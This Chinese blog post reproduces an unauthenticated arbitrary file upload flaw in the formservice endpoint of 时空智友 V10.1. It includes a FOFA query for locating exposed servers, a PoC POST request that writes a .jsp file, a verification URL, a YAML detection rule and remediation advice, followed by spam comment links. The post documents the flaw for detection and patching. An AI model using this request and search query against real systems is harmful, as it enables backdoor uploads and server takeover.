时空智友企业流程化管控系统文件上传漏洞复现

博主： xiaowu
发布时间：2023 年 12 月 05 日
51 次浏览
1 条评论
1441字数
分类：漏洞复现

时空智友企业流程化管控系统文件上传漏洞复现

产品简介

时空智友企业流程化管控系统是一个功能丰富、灵活可定制的企业管理工具。通过该系统，企业能够实现流程的自动化、协同的提升、数据的洞察和决策的优化，从而提高工作效率、管理水平和企业竞争力。

漏洞简介

时空智友企业流程化管控系统 formservice接口处存在任意文件上传漏洞，未经认证的攻击者可通过此接口上传后门文件，最终可导致服务器失陷。

影响范围

时空智友 V10.1

复现环境

FOFA：app="时空智友V10.1"

漏洞复现

POC

POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

文件内容

验证url

http://your-ip/form/temp/回显的文件名

检测POC规则编写

params: []
name: 时空智友企业流程化管控系统文件上传漏洞
set: {}
rules:
- method: POST
  path: /formservice?service=attachment.write&isattach=false&filename=aa.jsp
  headers: {}
  body: "123123"
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"aa.jsp")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

修复建议

接口访问权限增加强认证
设置安全组仅对可信地址开放
升级至安全版本

最后修改：2023 年 12 月 05 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

1 条评论

fqhuuhupke
October 1st, 2024 at 08:41 pm

看的我热血沸腾啊https://www.237fa.com/

回复

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

sbntsxcnra
《另一个人》剧情片高清在线免费观看：https://www.j...
miaewzdboj
《德黑兰第二季》欧美剧高清在线免费观看：https://www...
dpdqrkblhw
《另一个人》剧情片高清在线免费观看：https://www.j...
ustlbyfdhx
手机复古传奇？去哪找？：https://501h.com/yu...
uqqxpwlxcx
《另一个人》剧情片高清在线免费观看：https://www.j...

时空智友企业流程化管控系统文件上传漏洞复现

xiaowu • 2023 年 12 月 05 日

<h1>时空智友企业流程化管控系统文件上传漏洞复现</h1><h2>产品简介</h2><p>时空智友企业流程化管控系统是一个功能丰富、灵活可定制的企业管理工具。通过该系统，企业能够实现流程的自动化、协同的提升、数据的洞察和决策的优化，从而提高工作效率、管理水平和企业竞争力。</p><h2>漏洞简介</h2><p>时空智友企业流程化管控系统 formservice接口处存在任意文件上传漏洞，未经认证的攻击者可通过此接口上传后门文件，最终可导致服务器失陷。</p><h2>影响范围</h2><p>时空智友 V10.1</p><h2>复现环境</h2><p>FOFA：app="时空智友V10.1"<br><img src="https://xiaowu-1303812103.cos.ap-shanghai.myqcloud.com/2023/09/04/16937943999994.jpg" alt="" title=""style=""></p><h2>漏洞复现</h2><p>POC</p><pre><code class="lang-shell">POST /formservice?service=attachment.write&amp;isattach=false&amp;filename=a.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

文件内容</code></pre><p><img src="https://xiaowu-1303812103.cos.ap-shanghai.myqcloud.com/2023/09/04/16937945311081.jpg" alt="" title=""style=""></p><p>验证url</p><pre><code class="lang-shell">http://your-ip/form/temp/回显的文件名</code></pre><p><img src="https://xiaowu-1303812103.cos.ap-shanghai.myqcloud.com/2023/09/04/16937945769441.jpg" alt="" title=""style=""></p><h2>检测POC规则编写</h2><pre><code class="lang-shell">params: []
name: 时空智友企业流程化管控系统文件上传漏洞
set: {}
rules:
- method: POST
  path: /formservice?service=attachment.write&amp;isattach=false&amp;filename=aa.jsp
  headers: {}
  body: &quot;123123&quot;
  search: &quot;&quot;
  followredirects: false
  expression: response.status == 200 &amp;&amp; response.body.bcontains(b&quot;aa.jsp&quot;)
groups: {}
detail:
  author: &quot;&quot;
  links: []
  description: &quot;&quot;
  version: &quot;&quot;</code></pre><p><img src="https://xiaowu-1303812103.cos.ap-shanghai.myqcloud.com/2023/09/04/16937981767094.jpg" alt="" title=""style=""></p><h2>修复建议</h2><p>接口访问权限增加强认证<br>设置安全组仅对可信地址开放<br>升级至安全版本</p>